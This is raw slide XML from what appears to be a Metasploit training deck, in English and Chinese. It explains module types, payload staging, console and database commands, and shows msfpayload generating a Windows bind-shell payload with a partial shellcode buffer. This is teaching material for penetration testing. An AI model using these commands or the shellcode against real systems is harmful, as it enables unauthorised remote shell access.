              <a:t>Auxiliary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Post-Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>NOP generator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Payload encoder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Utilities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MSFpayload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Generate shellcode and executables.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>MSFencode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Alter payloads so that the original payload does not contain any bad characters.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Msfvenom</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Combination of both MSFpayload and MSFencode, which provides standard CLI options and increased speed.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3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Plugins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Plugins work directly with the API.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Manipulate the framework as a whole.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Plugins hook into the event subsystem.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Automate specific tasks which would be tedious to do manually.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Plugins only work in the msfconsole.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Plugins can add new console commands.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Extend the MSF functionality.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Plugins – Cont.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msfd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Daemon to share msf instance</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>openvas, nessus, nexpose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vulnerability scanners</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>pcap_log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pcap packet intercepter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>socket_logger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hook all created sockets by an exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Others (BTW, why not add yours?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>DarkOperator has some great plugins too (check the ref. page).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6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Plugins – Cont.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Load plugin using the load cli:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>load &lt;plugin-name&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>msf &gt; load pcap_log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Unload a plugin using the unload cli:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>unload &lt;plugin-name&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>msf &gt; unload pcap_log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84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Core Commands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help </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> list available commands</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>info </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> get more info about a module</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>search  search for specific module</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>search tag:keyword  search using keyword tag expression</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>	search platform:windows &lt;string&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>show, OR be specific </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>	[ exploits|post|nops|payloads|auxiliary ]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>show target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> view a list of platforms that the module supports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67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Core Commands - 2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connect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> similar to netcat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>back </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> switch between context</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>jobs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> display/manage jobs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>kill  end a specific job</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>use &lt;module-name&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> use a module</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>show options </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> check module options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>show advanced  check module advanced options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>set &lt;option&gt; &lt;value&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> setting module config value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>	set exploit &lt;exploit-name&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>exploit  run the module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47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b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>Exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr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  <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>exploit: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>一种利用漏洞对计算机系统进行入侵的程序。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，中文“有效载荷”，指成功</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>之后，真正在目标系统执行的代码或指令。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，简单翻译“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代码”，是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的一种，由于其建立正向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>反向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而得名。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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b="1" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>（用途）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>+ code(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>直接执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean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928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Core Commands - 3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irb </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> run live ruby interpreter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>load </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> load an MSF plugin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>	load pcap_log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>route  route traffic through a session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>	route [add/remove/get/flush/print] subnet netmask [comm/sid]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>sessions  list, configure, and close a session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>setg  set a global variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>save  saves the active datastore</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>unset and unsetg  unset a variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>exit  exit MSF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Database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MSF provides back end database support for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>PostgreSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DB stores information:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>host data, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>evidence, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>and exploit results.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MSF DB Basic Usage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db_connect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Connect to an existing database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>db_disconnect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D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>isconnect from the current </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> instance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>db_export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Export a file containing the contents of the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b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>db_import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Import a scan result file (check doc for supported file types)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>db_nmap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E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>xecutes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and records the output automatically</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>db_status</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1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Show the current database status</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>hosts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List all hosts in the database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>services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List all services in the database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>vulns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List all vulnerabilities in the database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>workspace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Switch between database workspaces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13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DB Tips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If posgress isn’t installed:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t># gem install pg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Connecting to the DB:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t># db_connect -y /opt/metasploit/config/database.yml</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Workspace helps you segment your work</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t># workspace -a NAME</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Adding/Deleting a Host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t># hosts –a / hosts -d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15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Auxiliary Modules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Auxiliaries are categorized by type:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Administrative (admin)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Cracking (analyze)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>NAT (bnat)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Denial of Service (dos)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Fuzzers (fuzzers)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Network services (server)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Others: client, crawler, gather, pdf, sniffer, vsploit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4953000" y="2133600"/>
            <a:ext cx="39624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Scanners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scanner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Spoofing (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spoof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SQLi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sqli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VoIP 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voip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itchFamily="18" charset="0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77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Payloads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Singles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completely standalone. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Add user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Stagers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> creates the network connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Stages </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> downloaded by Stagers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Meterpreter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represented by '/' in the payload name, then payload is Staged.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>windows/shell_bind_tcp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>single payload, with no stage!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>windows/shell/bind_tcp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>a stager (bind_tcp) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>a stage (shell).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Payloads Types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Inline (Non Staged)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Staged</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Meterpreter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>PassiveX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>NoNX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Ord</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>IPv6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Reflective DLL injection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2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Generating Shellcode using msfconsole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msf &gt; use payload/windows/shell_bind_tcp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>msf  payload(shell_bind_tcp) &gt; generate -h</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Usage: generate [options]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>OPTIONS:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>-E	        Force encoding.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>-b &lt;opt&gt;  The list of characters to avoid: '\x00\xff‘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>-e &lt;opt&gt;  The name of the encoder module to use.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>-f &lt;opt&gt;  The output file name (otherwise stdout)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>-o &lt;opt&gt;  Comma separated list of options VAR=VAL format.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>-s &lt;opt&gt;  NOP sled length.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>-t &lt;opt&gt;  Output format: raw, ruby, perl, bash, c, js,exe,etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Other Options (check the console).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5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Generating Shellcode using msfpayload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# msfpayload windows/shell_bind_tcp LPORT=2222 y</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t># windows/shell_bind_tcp - 341 bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t># http://www.metasploit.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t># VERBOSE=false, LPORT=2222, RHOST=, EXITFUNC=process, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t># InitialAutoRunScript=, AutoRunScript=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>buf = </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" +</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" +</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>[………..]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94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PoC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>，全称”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>Proof of Concept”</a:t>
            </a:r>
